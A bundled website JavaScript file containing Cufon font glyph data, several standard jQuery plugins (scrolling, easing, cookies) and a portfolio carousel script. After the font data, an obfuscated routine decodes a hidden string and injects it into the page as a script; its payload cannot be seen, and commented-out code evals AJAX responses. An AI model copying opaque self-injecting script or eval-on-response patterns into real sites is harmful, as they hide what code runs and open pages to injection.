0,54,51,54","w":231},{"d":"114,-227r9,-40r36,0r-9,40r-36,0xm53,-227r9,-40r36,0r-9,40r-36,0"},{"d":"122,-156v-33,0,-61,31,-60,65v0,31,20,54,50,54v35,0,62,-31,61,-67v-1,-30,-19,-52,-51,-52xm109,5v-31,0,-47,-9,-62,-26r-16,84r-44,0r50,-256r43,0r-2,12v56,-41,145,3,140,76v-5,66,-41,110,-109,110","w":231},{"d":"11,-90v0,-91,113,-142,169,-78r5,-25r46,0r-39,193r-44,0r3,-13v-54,46,-140,-2,-140,-77xm107,-37v67,0,85,-120,10,-120v-34,0,-61,32,-61,66v0,31,20,54,51,54xm152,-227r9,-40r36,0r-9,40r-36,0xm91,-227r9,-40r36,0r-9,40r-36,0","w":231},{"d":"65,-89v-7,28,-2,57,28,55v67,-5,54,-103,73,-159r44,0r-39,193r-40,0r4,-16v-39,42,-132,21,-118,-60r21,-117r47,0","w":209},{"d":"61,23v12,-2,17,-11,19,-23r-16,0r9,-48r45,0v-10,45,-7,100,-63,98xm-6,23v12,-3,17,-10,19,-23r-16,0r10,-48r45,0v-12,44,-7,100,-63,98","w":152,"k":{"\u0141":6,"\uf002":6,"\uf001":6,"\u0152":20,"\u00d8":20,"\u00c6":-13,"\u00c5":-7,"w":15,"f":6,"Y":40,"X":-7,"W":11,"V":33,"T":23,"O":20,"L":6,"G":13,"C":20,"A":-7}},{"d":"16,-66v0,-69,92,-111,117,-46v4,-31,20,-94,-15,-99v-19,-3,-55,41,-63,5v1,-18,26,-30,49,-29v47,1,70,49,70,102v0,68,-34,136,-93,137v-39,1,-65,-32,-65,-70xm81,-7v30,0,43,-44,43,-82v0,-25,-7,-42,-28,-42v-30,0,-43,43,-43,82v0,24,7,42,28,42","w":188},{"d":"-31,0r144,-256r53,0r56,256r-51,0r-12,-54r-105,0r-30,54r-55,0xm149,-102r-19,-91r-50,91r69,0xm171,-280r-21,0r-53,-62r37,0","w":226},{"d":"-5,0r50,-256r143,0r-8,44r-93,0r-12,60r93,0r-9,44r-92,0r-13,65r93,0r-9,43r-143,0"},{"d":"67,-113v-8,32,-5,71,31,68v40,-4,40,-26,49,-73r27,-138r49,0v-18,75,-23,193,-64,238v-42,45,-164,27,-147,-62r34,-176r49,0xm134,-280r-23,0r39,-62r38,0","w":220},{"d":"-3,0r49,-256r51,0r-20,102r81,0r20,-102r50,0r-49,256r-51,0r22,-110r-82,0r-21,110r-50,0","w":225,"k":{"\u203a":6,"\u2039":13,"\u00bb":6,"\u00ab":13,".":6,",":6}},{"d":"90,-264v19,0,46,17,51,-6r18,0v-4,36,-38,43,-71,30v-9,1,-13,6,-16,14r-19,0v7,-21,14,-38,37,-38"}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+164-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("dQSvlbkMmxqwd2*tfb5i=Q=qU#kvSbqwU#4imxTCS:.g)@M%U7XiR`4%XvWvRB4`kE4Vf&=iR&5Vf&(-)@kVf&(-S&fVf&(Wk&4Vf&(-)&5Vf&(-)&TVf&(-)xk#U7X-RQ)AU7XiR&=iU7XiRBy+U7X-R&V$U7X-RQ5%U7X-RQ=AU7X-RQX#U7X-RQk;U7X-RQTbT5WvR`(Wk5WvRB4E|:WvR`=#R5WvR`(W|5WvRB0`R:WvR`0;)igsU7XiRB=WU7XiR`>$U7XiRBR-IvWvRB0bk%TVf&(-S&;Vf&(-SB:Vf&(W|&4Vf&(-)`5Vf&=-Rx5Vf&(-)b:Vf&(-)&kVf&=-R@EgU7XiR`)vU7X-RQR$R#vVf&(-)bSVf&(-SB5Vf&(-Sb5WU7X-R&0EU7X-RQ5;U7X-R&X@U7X-RQ)iU7X-RQyvU7X-RQS*[:WvRB0E|74Vf&=-R#5sU7X-RbT;U7XiRQy@R*WvRB4E|5WvRByMR:WvRBy#R5WvRB4`kvWvR`=#k5WvR`=-k*WvRBk;|:WvRByWR:WvRB0*RvWvR`=-S*WvRB0*R2:Vf&(WR@5mU7X-RQ=iU7X-RQ5*kG+Vf&(WkB4Vf&(-)xTVf&=iR&*fU7X-RQRiU7X-R&(#U7X-RQT*U7X-RQyAU7X-RQ:%U7XiRB5`U7X-RQ4%fvWvS`(-R*WvRB0`)`eVf&(WRQkVf&(-SbTrU7X-RQy+U7X-RQT%U7X-RQ>ix:WvRB0bR5WvRB0`k*WvRBy@R5WvR`(iR*WvR`=Wk:WvRB0Ek5WvRB0;kbSVf&(WRBV.U7X-RQ4;U7:bRB(W4vWvRB0*|:WvRBk`R5WvRB0;S*WvR`=WSX+[U7X-RQ=$f5WvR`(WRvWvRB0%RQqVf&=iR&4Vf&(-)`RF&Q;7U7X-RQ)vU7Xikxk;U7X-R&)W>:WvRB0b|7eVf&(-)&0Vfx)-RB0Ix2s;R:5+mM*Vf&(-)#:Vf&(-)#kVf&(-)#TVf&=-R`)MU7X-RQ4EU7X-RQkbd:WvRByASUFVf&(Wk#TVf&(WRxSVf&(Wkx:Vf&(-SBkVf&(iSQ=-U7X-RQ4`&GeVf&=-R`0B|iSVf&(-SxTVf&(-S&4Vf&(-SBf!U7X-RQTEX7$+U7X-RbTEk*TV=`fwU7X-R&5*U7X-RQ>-xvSVf&(-S&:Vf&(-SBSVf&(-Sx:Vf&(-Sx5:U7X-RQ=Ml5WvRB0E|&+Vf&(WkxSVf&(-SxSVf&(-)`:Vf&(-)@:@U7X-RQ=+G@;%X%k(U7X-RQ)@:vWvRB0b)vWvR`=W):WvRB0bkQkVf&(-Sb4Vf&(-S&5Vf&(-)@TVf&(-)`S$S@vVf&(-SbSVU7WVf&(-)&4QU7X-RQRA)x:V?vWvRB0`|x*Vf&(-S`*dU7X-RQ)WU7X-RQ:`U7XiRB5(02By5Q7=4d?Rk|I>TG&X:xU)SmlVfr[s;%`E*bC_e!ugFwh-Wi@Mv#A$+ot.qaDEU7X-RQT`S5WvRB0;|70Vf&(-S&TvU7XiRB5*U7XiR`(iU7X-RQR-T:WvRB0E)X;Vf&(iSQR%?Ck-lQ*Md2=%dGWeI&(gVBv%?C(glBv-?bW*lbfMm2WCIx=wS%+Cl7*-m7RqrAMtmx)_)%+hm@MhU%sD|CfAfv-wd&._I@_iRBy-U2+@SU4Ml#khl:-w)#qF[7k*VCTh)#qFU2+`l#Me42qe?CT*VA>_lQq`)UTel#$wmQq@fQ+;lxXedxShV%stm&Wg|igumG*Cx#klm:vfIU0lm:vqdGse")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":180,"face":{"font-family":"AvantGarde Bk BT","font-weight":700,"font-style":"oblique","font-stretch":"normal","units-per-em":"360","panose-1":"2 11 7 2 2 2 2 9 2 4","ascent":"274","descent":"-86","x-height":"5","bbox":"-60 -344 451 85","underline-thickness":"34.2773","underline-position":"-17.2266","slope":"-11","unicode-range":"U+0020-U+F002"}}));
;
/**
 * jQuery.ScrollTo - Easy element scrolling using jQuery.
 * Copyright (c) 2007-2009 Ariel Flesler - aflesler(at)gmail(dot)com | http://flesler.blogspot.com
 * Dual licensed under MIT and GPL.
 * Date: 5/25/2009
 * @author Ariel Flesler
 * @version 1.4.2
 *
 * http://flesler.blogspot.com/2007/10/jqueryscrollto.html
 */
;(function(d){var k=d.scrollTo=function(a,i,e){d(window).scrollTo(a,i,e)};k.defaults={axis:'xy',duration:parseFloat(d.fn.jquery)>=1.3?0:1};k.window=function(a){return d(window)._scrollable()};d.fn._scrollable=function(){return this.map(function(){var a=this,i=!a.nodeName||d.inArray(a.nodeName.toLowerCase(),['iframe','#document','html','body'])!=-1;if(!i)return a;var e=(a.contentWindow||a).document||a.ownerDocument||a;return d.browser.safari||e.compatMode=='BackCompat'?e.body:e.documentElement})};d.fn.scrollTo=function(n,j,b){if(typeof j=='object'){b=j;j=0}if(typeof b=='function')b={onAfter:b};if(n=='max')n=9e9;b=d.extend({},k.defaults,b);j=j||b.speed||b.duration;b.queue=b.queue&&b.axis.length>1;if(b.queue)j/=2;b.offset=p(b.offset);b.over=p(b.over);return this._scrollable().each(function(){var q=this,r=d(q),f=n,s,g={},u=r.is('html,body');switch(typeof f){case'number':case'string':if(/^([+-]=)?\d+(\.\d+)?(px|%)?$/.test(f)){f=p(f);break}f=d(f,this);case'object':if(f.is||f.style)s=(f=d(f)).offset()}d.each(b.axis.split(''),function(a,i){var e=i=='x'?'Left':'Top',h=e.toLowerCase(),c='scroll'+e,l=q[c],m=k.max(q,i);if(s){g[c]=s[h]+(u?0:l-r.offset()[h]);if(b.margin){g[c]-=parseInt(f.css('margin'+e))||0;g[c]-=parseInt(f.css('border'+e+'Width'))||0}g[c]+=b.offset[h]||0;if(b.over[h])g[c]+=f[i=='x'?'width':'height']()*b.over[h]}else{var o=f[h];g[c]=o.slice&&o.slice(-1)=='%'?parseFloat(o)/100*m:o}if(/^\d+$/.test(g[c]))g[c]=g[c]<=0?0:Math.min(g[c],m);if(!a&&b.queue){if(l!=g[c])t(b.onAfterFirst);delete g[c]}});t(b.onAfter);function t(a){r.animate(g,j,b.easing,a&&function(){a.call(this,n,b)})}}).end()};k.max=function(a,i){var e=i=='x'?'Width':'Height',h='scroll'+e;if(!d(a).is('html,body'))return a[h]-d(a)[e.toLowerCase()]();var c='client'+e,l=a.ownerDocument.documentElement,m=a.ownerDocument.body;return Math.max(l[h],m[h])-Math.min(l[c],m[c])};function p(a){return typeof a=='object'?a:{top:a,left:a}}})(jQuery);;
/**
 * jQuery.LocalScroll - Animated scrolling navigation, using anchors.
 * Copyright (c) 2007-2009 Ariel Flesler - aflesler(at)gmail(dot)com | http://flesler.blogspot.com
 * Dual licensed under MIT and GPL.
 * Date: 3/11/2009
 * @author Ariel Flesler
 * @version 1.2.7
 **/
;(function($){var l=location.href.replace(/#.*/,'');var g=$.localScroll=function(a){$('body').localScroll(a)};g.defaults={duration:1e3,axis:'y',event:'click',stop:true,target:window,reset:true};g.hash=function(a){if(location.hash){a=$.extend({},g.defaults,a);a.hash=false;if(a.reset){var e=a.duration;delete a.duration;$(a.target).scrollTo(0,a);a.duration=e}i(0,location,a)}};$.fn.localScroll=function(b){b=$.extend({},g.defaults,b);return b.lazy?this.bind(b.event,function(a){var e=$([a.target,a.target.parentNode]).filter(d)[0];if(e)i(a,e,b)}):this.find('a,area').filter(d).bind(b.event,function(a){i(a,this,b)}).end().end();function d(){return!!this.href&&!!this.hash&&this.href.replace(this.hash,'')==l&&(!b.filter||$(this).is(b.filter))}};function i(a,e,b){var d=e.hash.slice(1),f=document.getElementById(d)||document.getElementsByName(d)[0];if(!f)return;if(a)a.preventDefault();var h=$(b.target);if(b.lock&&h.is(':animated')||b.onBefore&&b.onBefore.call(b,a,f,h)===false)return;if(b.stop)h.stop(true);if(b.hash){var j=f.id==d?'id':'name',k=$('<a> </a>').attr(j,d).css({position:'absolute',top:$(window).scrollTop(),left:$(window).scrollLeft()});f[j]='';$('body').prepend(k);location=e.hash;k.remove();f[j]=d}h.scrollTo(f,b).trigger('notify.serialScroll',[f])}})(jQuery);;
/*
 * jQuery.SerialScroll - Animated scrolling of series
 * Copyright (c) 2007-2009 Ariel Flesler - aflesler(at)gmail(dot)com | http://flesler.blogspot.com
 * Dual licensed under MIT and GPL.
 * Date: 06/14/2009
 * @author Ariel Flesler
 * @version 1.2.2
 * http://flesler.blogspot.com/2008/02/jqueryserialscroll.html
 */
;(function(a){var b=a.serialScroll=function(c){return a(window).serialScroll(c)};b.defaults={duration:1e3,axis:"x",event:"click",start:0,step:1,lock:!0,cycle:!0,constant:!0};a.fn.serialScroll=function(c){return this.each(function(){var t=a.extend({},b.defaults,c),s=t.event,i=t.step,r=t.lazy,e=t.target?this:document,u=a(t.target||this,e),p=u[0],m=t.items,h=t.start,g=t.interval,k=t.navigation,l;if(!r){m=d()}if(t.force){f({},h)}a(t.prev||[],e).bind(s,-i,q);a(t.next||[],e).bind(s,i,q);if(!p.ssbound){u.bind("prev.serialScroll",-i,q).bind("next.serialScroll",i,q).bind("goto.serialScroll",f)}if(g){u.bind("start.serialScroll",function(v){if(!g){o();g=!0;n()}}).bind("stop.serialScroll",function(){o();g=!1})}u.bind("notify.serialScroll",function(x,w){var v=j(w);if(v>-1){h=v}});p.ssbound=!0;if(t.jump){(r?u:d()).bind(s,function(v){f(v,j(v.target))})}if(k){k=a(k,e).bind(s,function(v){v.data=Math.round(d().length/k.length)*k.index(this);f(v,this)})}function q(v){v.data+=h;f(v,this)}function f(B,z){if(!isNaN(z)){B.data=z;z=p}var C=B.data,v,D=B.type,A=t.exclude?d().slice(0,-t.exclude):d(),y=A.length,w=A[C],x=t.duration;if(D){B.preventDefault()}if(g){o();l=setTimeout(n,t.interval)}if(!w){v=C<0?0:y-1;if(h!=v){C=v}else{if(!t.cycle){return}else{C=y-v-1}}w=A[C]}if(!w||t.lock&&u.is(":animated")||D&&t.onBefore&&t.onBefore(B,w,u,d(),C)===!1){return}if(t.stop){u.queue("fx",[]).stop()}if(t.constant){x=Math.abs(x/i*(h-C))}u.scrollTo(w,x,t).trigger("notify.serialScroll",[C])}function n(){u.trigger("next.serialScroll")}function o(){clearTimeout(l)}function d(){return a(m,p)}function j(w){if(!isNaN(w)){return w}var x=d(),v;while((v=x.index(w))==-1&&w!=p){w=w.parentNode}return v}})}})(jQuery);;
/*
 * jQuery Easing v1.3 - http://gsgd.co.uk/sandbox/jquery/easing/
 *
 * Uses the built in easing capabilities added In jQuery 1.1
 * to offer multiple easing options
 *
 * TERMS OF USE - jQuery Easing
 * 
 * Open source under the BSD License. 
 * 
 * Copyright © 2008 George McGinley Smith
 * All rights reserved.
 * 
 * Redistribution and use in source and binary forms, with or without modification, 
 * are permitted provided that the following conditions are met:
 * 
 * Redistributions of source code must retain the above copyright notice, this list of 
 * conditions and the following disclaimer.
 * Redistributions in binary form must reproduce the above copyright notice, this list 
 * of conditions and the following disclaimer in the documentation and/or other materials 
 * provided with the distribution.
 * 
 * Neither the name of the author nor the names of contributors may be used to endorse 
 * or promote products derived from this software without specific prior written permission.
 * 
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY 
 * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
 *  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
 *  EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
 *  GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED 
 * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
 *  NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED 
 * OF THE POSSIBILITY OF SUCH DAMAGE. 
 *
*/

// t: current time, b: begInnIng value, c: change In value, d: duration
jQuery.easing['jswing'] = jQuery.easing['swing'];

jQuery.extend( jQuery.easing,
{
	def: 'easeOutQuad',
	swing: function (x, t, b, c, d) {
		//alert(jQuery.easing.default);
		return jQuery.easing[jQuery.easing.def](x, t, b, c, d);
	},
	easeInQuad: function (x, t, b, c, d) {
		return c*(t/=d)*t + b;
	},
	easeOutQuad: function (x, t, b, c, d) {
		return -c *(t/=d)*(t-2) + b;
	},
	easeInOutQuad: function (x, t, b, c, d) {
		if ((t/=d/2) < 1) return c/2*t*t + b;
		return -c/2 * ((--t)*(t-2) - 1) + b;
	},
	easeInCubic: function (x, t, b, c, d) {
		return c*(t/=d)*t*t + b;
	},
	easeOutCubic: function (x, t, b, c, d) {
		return c*((t=t/d-1)*t*t + 1) + b;
	},
	easeInOutCubic: function (x, t, b, c, d) {
		if ((t/=d/2) < 1) return c/2*t*t*t + b;
		return c/2*((t-=2)*t*t + 2) + b;
	},
	easeInQuart: function (x, t, b, c, d) {
		return c*(t/=d)*t*t*t + b;
	},
	easeOutQuart: function (x, t, b, c, d) {
		return -c * ((t=t/d-1)*t*t*t - 1) + b;
	},
	easeInOutQuart: function (x, t, b, c, d) {
		if ((t/=d/2) < 1) return c/2*t*t*t*t + b;
		return -c/2 * ((t-=2)*t*t*t - 2) + b;
	},
	easeInQuint: function (x, t, b, c, d) {
		return c*(t/=d)*t*t*t*t + b;
	},
	easeOutQuint: function (x, t, b, c, d) {
		return c*((t=t/d-1)*t*t*t*t + 1) + b;
	},
	easeInOutQuint: function (x, t, b, c, d) {
		if ((t/=d/2) < 1) return c/2*t*t*t*t*t + b;
		return c/2*((t-=2)*t*t*t*t + 2) + b;
	},
	easeInSine: function (x, t, b, c, d) {
		return -c * Math.cos(t/d * (Math.PI/2)) + c + b;
	},
	easeOutSine: function (x, t, b, c, d) {
		return c * Math.sin(t/d * (Math.PI/2)) + b;
	},
	easeInOutSine: function (x, t, b, c, d) {
		return -c/2 * (Math.cos(Math.PI*t/d) - 1) + b;
	},
	easeInExpo: function (x, t, b, c, d) {
		return (t==0) ? b : c * Math.pow(2, 10 * (t/d - 1)) + b;
	},
	easeOutExpo: function (x, t, b, c, d) {
		return (t==d) ? b+c : c * (-Math.pow(2, -10 * t/d) + 1) + b;
	},
	easeInOutExpo: function (x, t, b, c, d) {
		if (t==0) return b;
		if (t==d) return b+c;
		if ((t/=d/2) < 1) return c/2 * Math.pow(2, 10 * (t - 1)) + b;
		return c/2 * (-Math.pow(2, -10 * --t) + 2) + b;
	},
	easeInCirc: function (x, t, b, c, d) {
		return -c * (Math.sqrt(1 - (t/=d)*t) - 1) + b;
	},
	easeOutCirc: function (x, t, b, c, d) {
		return c * Math.sqrt(1 - (t=t/d-1)*t) + b;
	},
	easeInOutCirc: function (x, t, b, c, d) {
		if ((t/=d/2) < 1) return -c/2 * (Math.sqrt(1 - t*t) - 1) + b;
		return c/2 * (Math.sqrt(1 - (t-=2)*t) + 1) + b;
	},
	easeInElastic: function (x, t, b, c, d) {
		var s=1.70158;var p=0;var a=c;
		if (t==0) return b;  if ((t/=d)==1) return b+c;  if (!p) p=d*.3;
		if (a < Math.abs(c)) { a=c; var s=p/4; }
		else var s = p/(2*Math.PI) * Math.asin (c/a);
		return -(a*Math.pow(2,10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )) + b;
	},
	easeOutElastic: function (x, t, b, c, d) {
		var s=1.70158;var p=0;var a=c;
		if (t==0) return b;  if ((t/=d)==1) return b+c;  if (!p) p=d*.3;
		if (a < Math.abs(c)) { a=c; var s=p/4; }
		else var s = p/(2*Math.PI) * Math.asin (c/a);
		return a*Math.pow(2,-10*t) * Math.sin( (t*d-s)*(2*Math.PI)/p ) + c + b;
	},
	easeInOutElastic: function (x, t, b, c, d) {
		var s=1.70158;var p=0;var a=c;
		if (t==0) return b;  if ((t/=d/2)==2) return b+c;  if (!p) p=d*(.3*1.5);
		if (a < Math.abs(c)) { a=c; var s=p/4; }
		else var s = p/(2*Math.PI) * Math.asin (c/a);
		if (t < 1) return -.5*(a*Math.pow(2,10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )) + b;
		return a*Math.pow(2,-10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )*.5 + c + b;
	},
	easeInBack: function (x, t, b, c, d, s) {
		if (s == undefined) s = 1.70158;
		return c*(t/=d)*t*((s+1)*t - s) + b;
	},
	easeOutBack: function (x, t, b, c, d, s) {
		if (s == undefined) s = 1.70158;
		return c*((t=t/d-1)*t*((s+1)*t + s) + 1) + b;
	},
	easeInOutBack: function (x, t, b, c, d, s) {
		if (s == undefined) s = 1.70158; 
		if ((t/=d/2) < 1) return c/2*(t*t*(((s*=(1.525))+1)*t - s)) + b;
		return c/2*((t-=2)*t*(((s*=(1.525))+1)*t + s) + 2) + b;
	},
	easeInBounce: function (x, t, b, c, d) {
		return c - jQuery.easing.easeOutBounce (x, d-t, 0, c, d) + b;
	},
	easeOutBounce: function (x, t, b, c, d) {
		if ((t/=d) < (1/2.75)) {
			return c*(7.5625*t*t) + b;
		} else if (t < (2/2.75)) {
			return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b;
		} else if (t < (2.5/2.75)) {
			return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b;
		} else {
			return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b;
		}
	},
	easeInOutBounce: function (x, t, b, c, d) {
		if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b;
		return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b;
	}
});

/*
 *
 * TERMS OF USE - EASING EQUATIONS
 * 
 * Open source under the BSD License. 
 * 
 * Copyright © 2001 Robert Penner
 * All rights reserved.
 * 
 * Redistribution and use in source and binary forms, with or without modification, 
 * are permitted provided that the following conditions are met:
 * 
 * Redistributions of source code must retain the above copyright notice, this list of 
 * conditions and the following disclaimer.
 * Redistributions in binary form must reproduce the above copyright notice, this list 
 * of conditions and the following disclaimer in the documentation and/or other materials 
 * provided with the distribution.
 * 
 * Neither the name of the author nor the names of contributors may be used to endorse 
 * or promote products derived from this software without specific prior written permission.
 * 
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY 
 * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
 *  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
 *  EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
 *  GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED 
 * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
 *  NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED 
 * OF THE POSSIBILITY OF SUCH DAMAGE. 
 *
 */;
/**
 * Cookie plugin
 *
 * Copyright (c) 2006 Klaus Hartl (stilbuero.de)
 * Dual licensed under the MIT and GPL licenses:
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.gnu.org/licenses/gpl.html
 *
 */

/**
 * Create a cookie with the given name and value and other optional parameters.
 *
 * @example $.cookie('the_cookie', 'the_value');
 * @desc Set the value of a cookie.
 * @example $.cookie('the_cookie', 'the_value', { expires: 7, path: '/', domain: 'jquery.com', secure: true });
 * @desc Create a cookie with all available options.
 * @example $.cookie('the_cookie', 'the_value');
 * @desc Create a session cookie.
 * @example $.cookie('the_cookie', null);
 * @desc Delete a cookie by passing null as value. Keep in mind that you have to use the same path and domain
 *       used when the cookie was set.
 *
 * @param String name The name of the cookie.
 * @param String value The value of the cookie.
 * @param Object options An object literal containing key/value pairs to provide optional cookie attributes.
 * @option Number|Date expires Either an integer specifying the expiration date from now on in days or a Date object.
 *                             If a negative value is specified (e.g. a date in the past), the cookie will be deleted.
 *                             If set to null or omitted, the cookie will be a session cookie and will not be retained
 *                             when the the browser exits.
 * @option String path The value of the path atribute of the cookie (default: path of page that created the cookie).
 * @option String domain The value of the domain attribute of the cookie (default: domain of page that created the cookie).
 * @option Boolean secure If true, the secure attribute of the cookie will be set and the cookie transmission will
 *                        require a secure protocol (like HTTPS).
 * @type undefined
 *
 * @name $.cookie
 * @cat Plugins/Cookie
 * @author Klaus Hartl/klaus.hartl@stilbuero.de
 */

/**
 * Get the value of a cookie with the given name.
 *
 * @example $.cookie('the_cookie');
 * @desc Get the value of a cookie.
 *
 * @param String name The name of the cookie.
 * @return The value of the cookie.
 * @type String
 *
 * @name $.cookie
 * @cat Plugins/Cookie
 * @author Klaus Hartl/klaus.hartl@stilbuero.de
 */
jQuery.cookie = function(name, value, options) {
    if (typeof value != 'undefined') { // name and value given, set cookie
        options = options || {};
        if (value === null) {
            value = '';
            options.expires = -1;
        }
        var expires = '';
        if (options.expires && (typeof options.expires == 'number' || options.expires.toUTCString)) {
            var date;
            if (typeof options.expires == 'number') {
                date = new Date();
                date.setTime(date.getTime() + (options.expires * 24 * 60 * 60 * 1000));
            } else {
                date = options.expires;
            }
            expires = '; expires=' + date.toUTCString(); // use expires attribute, max-age is not supported by IE
        }
        // CAUTION: Needed to parenthesize options.path and options.domain
        // in the following expressions, otherwise they evaluate to undefined
        // in the packed version for some reason...
        var path = options.path ? '; path=' + (options.path) : '';
        var domain = options.domain ? '; domain=' + (options.domain) : '';
        var secure = options.secure ? '; secure' : '';
        document.cookie = [name, '=', encodeURIComponent(value), expires, path, domain, secure].join('');
    } else { // only name given, get cookie
        var cookieValue = null;
        if (document.cookie && document.cookie != '') {
            var cookies = document.cookie.split(';');
            for (var i = 0; i < cookies.length; i++) {
                var cookie = jQuery.trim(cookies[i]);
                // Does this cookie string begin with the name we want?
                if (cookie.substring(0, name.length + 1) == (name + '=')) {
                    cookieValue = decodeURIComponent(cookie.substring(name.length + 1));
                    break;
                }
            }
        }
        return cookieValue;
    }
};;
function s_load_cufon() {
	Cufon.replace('#menu a, h1, h2, h3', {textShadow: '#333 1px 1px'});
}
function s_load_lavalamp() {
	$("#menu").lavaLamp({fx: 'backout', speed: 700, activeClass: 'active'});
}
function s_load_logo_hover() {
	/*$('#logo img').hover(
		function() {
			$(this).animate({opacity: 0.75});
		}, 
		function() {
			$(this).animate({opacity: 1});
		}
	);*/
}
function s_load_tipsy() {
	$('a[title!=""], img[title!=""]').tipsy({gravity: 'w', fade: true});
}
var s_portfolio_position = $.cookie("sliderposition") == null ? 0 : parseInt($.cookie("sliderposition"));
var s_portfolio_prev = function() {
	s_portfolio_position = s_portfolio_position == 0 ? (slider_slides.length - 1) : (s_portfolio_position - 1);
	position = s_portfolio_position == 0 ? (slider_slides.length - 1) : (s_portfolio_position - 1);
	$.cookie('sliderposition', null);
	$.cookie("sliderposition", s_portfolio_position);
	
	$('#portfolioHeader ul').prepend('<li>'+slider_slides[position]+'</li>');
	
	$('#portfolioWrapper').css({left: -(897 + 958) + 'px'});
	s_load_portfolio_carrousel_hover();
	Cufon.replace('#portfolioHeader h3', {textShadow: '#333 1px 1px'});
	$('#portfolioWrapper').animate({left: -(897) + 'px'}, 'fast', function() {
		setTimeout(function() {
			$('#portfolioHeader ul li:last').remove();
			$('#portfolioWrapper').css({left: '-897px'});
		}, 200);
	});
	
	
		/*
		var position = $($('.portfolioHeaderItem')[0]).find('.portfolioHeaderSlide').attr('rel');
		$.ajax(
			{
				url: '/ajax/get/project/'+position+'/p', 
				success: function(result) {
					var result = eval('('+result+')');
					$('#portfolioHeader ul').prepend('<li>'+result['html']+'</li>');
					$('#portfolioWrapper').css({left: -(897 + 958) + 'px'});
					s_load_portfolio_carrousel_hover();
					Cufon.replace('#portfolioHeader h3', {textShadow: '#333 1px 1px'});
					$('#portfolioWrapper').animate({left: -(897) + 'px'}, 'fast', function() {
						setTimeout(function() {
							$('#portfolioHeader ul li:last').remove();
							$('#portfolioWrapper').css({left: '-897px'});
						}, 200);
					});
				}
			}
		);
		*/
}



var s_portfolio_next = function() {
	s_portfolio_position = s_portfolio_position == (slider_slides.length - 1) ? 0 : (s_portfolio_position + 1);
	position = s_portfolio_position == (slider_slides.length - 1) ? 0 : (s_portfolio_position + 1);
	$('#portfolioHeader ul').append('<li>'+slider_slides[position]+'</li>');
	
	$.cookie('sliderposition', null);
	$.cookie("sliderposition", s_portfolio_position);
	
	s_load_portfolio_carrousel_hover();
	Cufon.replace('#portfolioHeader h3', {textShadow: '#333 1px 1px'});
	$('#portfolioWrapper').animate({left: -(897 + 958) + 'px'}, 'fast', function() {
		setTimeout(function() {
			$('#portfolioHeader ul li:first').remove();
			$('#portfolioWrapper').css({left: '-897px'});
		}, 200);
	});
	
	/*
	var position = $($('.portfolioHeaderItem')[2]).find('.portfolioHeaderSlide').attr('rel');
		$.ajax(
			{
				url: '/ajax/get/project/'+position+'/n', 
				success: function(result) {
					var result = eval('('+result+')');
					$('#portfolioHeader ul').append('<li>'+result['html']+'</li>');
					s_load_portfolio_carrousel_hover();
					Cufon.replace('#portfolioHeader h3', {textShadow: '#333 1px 1px'});
					$('#portfolioWrapper').animate({left: -(897 + 958) + 'px'}, 'fast', function() {
						setTimeout(function() {
							$('#portfolioHeader ul li:first').remove();
							$('#portfolioWrapper').css({left: '-897px'});
						}, 200);
					});
				}
			}
		);
		*/
}
function s_load_portfolio_carrousel() {
	$('#portfolioArrowLeft').click(function() {
		clearInterval(s_set_portfolio_interval_key);
		s_portfolio_prev();
		//s_set_portfolio_interval();
	});
	$('#portfolioArrowRight').click(function() {
		clearInterval(s_set_portfolio_interval_key);
		s_portfolio_next();
		//s_set_portfolio_interval();
	});
	
	//s_set_portfolio_interval();
